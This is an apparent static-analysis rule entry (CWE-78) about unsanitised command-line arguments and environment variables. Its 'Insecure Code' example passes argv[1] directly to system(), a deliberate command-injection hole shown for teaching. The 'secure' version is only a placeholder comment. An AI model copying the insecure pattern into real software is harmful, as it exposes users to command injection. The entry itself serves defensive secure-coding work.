Command-Line Argument or Environment Variable Access
Description
The program accesses command-line arguments or environment variables, which are controlled by potential attackers. This could lead to security vulnerabilities if the input is not properly sanitized.
Examples
Insecure Code
c
int main(int argc, char *argv[]) { system(argv[1]); }Secure Code
c
int main(int argc, char *argv[]) { if (argc > 1) { /* validate and sanitize argv[1] */ } }Remediation
Validate and sanitize command-line arguments and environment variables before using them.
Rule Details
| Field | Value |
|---|---|
| ID | CODE-0185 |
| Category | Injection |
| Severity | MEDIUM |
| CWE | CWE-78 |
| Confidence | MEDIUM |
| Impact | MEDIUM |
| Likelihood | MEDIUM |
| Exploitability | MODERATE |
| Tags | command-line, environment-variables |
| OWASP | N/A |